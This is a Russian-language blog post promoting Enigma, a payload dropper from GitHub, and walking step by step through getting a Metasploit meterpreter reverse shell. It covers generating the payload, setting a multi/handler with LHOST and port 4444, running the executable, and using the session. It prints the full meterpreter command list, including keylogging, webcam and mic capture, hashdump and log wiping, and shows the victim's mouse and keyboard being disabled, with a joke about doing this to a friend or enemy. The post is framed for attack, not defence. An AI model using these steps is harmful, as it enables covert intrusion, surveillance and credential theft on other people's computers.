Enigma - Multiplatform Payload Dropper

Enigma - Multiplatform Payload Dropper

Life-Hack

Всем здравствуйте!

В очередной раз, блужданию по гитхабу, натыкаюсь на таку красаву!

Enigma - генератор пейлоадов (полезной нагрузки) под винду и Линукс. Работает в связке с Метасплойтом.

Программа спросит, какую опцию выбираем: сгенерировать свой пейлоад или пейлоад для Метасплойта.

Выбираю вторую.

Затем, прописываем свой айпишник и порт 4444

Началось создание пейлоада...

Пейлоады созданы и программа желает удачного взлома.

Далее, запускаем Метасплоит командой

msfconsole

Метас запустился и следующие команды будут такие

>use multi/handler

Прикручиваем начинку - наш windows/meterpreter/reverse_tcp

>set payload windows/meterpreter/reverse_tcp

Прописываем параметры начинки LHOST и LPORT

>set LHOST ваш айпи

>set LPORT 4444

Нормально прикрутилась, пора командовать exploit

>exploit

Ждёт сессию от зараженного компа. Так как заражать пока некого, то запущу екзешник пейлоада на своём компе в среде wine. Для этого, надо открыть папку с Enigma, пройти по пути Server/x86/win.exe и запустить пейлоад.

Сессия получена, условная жертва заражена и meterpreter ждёт команд.

пишем help и метерпретер выдал нам кучу команд, которые удобно разбиты по категориям.


Core Commands

=============


Command Description

------- -----------

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information about active channels

close Closes a channel

disable_unicode_encoding Disables encoding of unicode strings

enable_unicode_encoding Enables encoding of unicode strings

exit Terminate the meterpreter session

help Help menu

info Displays information about a Post module

interact Interacts with a channel

irb Drop into irb scripting mode

load Load one or more meterpreter extensions

migrate Migrate the server to another process

quit Terminate the meterpreter session

read Reads data from a channel

resource Run the commands stored in a file

run Executes a meterpreter script or Post module

use Deprecated alias for 'load'

write Writes data to a channel



Stdapi: File system Commands

============================


Command Description

------- -----------

cat Read the contents of a file to the screen

cd Change directory

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lpwd Print local working directory

ls List files

mkdir Make directory

mv Move source to destination

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

upload Upload a file or directory



Stdapi: Networking Commands

===========================


Command Description

------- -----------

arp Display the host ARP cache

getproxy Display the current proxy configuration

ifconfig Display interfaces

ipconfig Display interfaces

netstat Display the network connections

portfwd Forward a local port to a remote service

route View and modify the routing table



Stdapi: System Commands

=======================


Command Description

------- -----------

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getenv Get one or more environment variable values

getpid Get the current process identifier

getprivs Attempt to enable all privileges available to the current process

getsid Get the SID of the user that the server is running as

getuid Get the user that the server is running as

kill Terminate a process

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

suspend Suspends or resumes a list of processes

sysinfo Gets information about the remote system, such as OS



Stdapi: User interface Commands

===============================


Command Description

------- -----------

enumdesktops List all accessible desktops and window stations

getdesktop Get the current meterpreter desktop

idletime Returns the number of seconds the remote user has been idle

keyscan_dump Dump the keystroke buffer

keyscan_start Start capturing keystrokes

keyscan_stop Stop capturing keystrokes

screenshot Grab a screenshot of the interactive desktop

setdesktop Change the meterpreters current desktop

uictl Control some of the user interface components



Stdapi: Webcam Commands

=======================


Command Description

------- -----------

record_mic Record audio from the default microphone for X seconds

webcam_chat Start a video chat

webcam_list List webcams

webcam_snap Take a snapshot from the specified webcam

webcam_stream Play a video stream from the specified webcam



Priv: Elevate Commands

======================


Command Description

------- -----------

getsystem Attempt to elevate your privilege to that of local system.



Priv: Password database Commands

================================


Command Description

------- -----------

hashdump Dumps the contents of the SAM database



Priv: Timestomp Commands

========================


Command Description

------- -----------

timestomp Manipulate file MACE attributes


Описывать сейчас каждую я не буду, для знающих людей хелпа на английском достаточно. Попробуем что-нибудь из этих команд, посмотрим например версию ОС:

sysinfo

Выключим у юзверя например мышку командой

uictl disable mouse

Так, мыша не работает, ну и тогда, клаву тоже отрубаем командой

uictl disable keyboard

Бедный ваш друг/враг оставшийся без интерфейсов управления своим компом.))) Источник


Установка и запуск

>git clone https://github.com/UndeadSec/Enigma.git

>cd Enigma

>python enigma.py


Report Page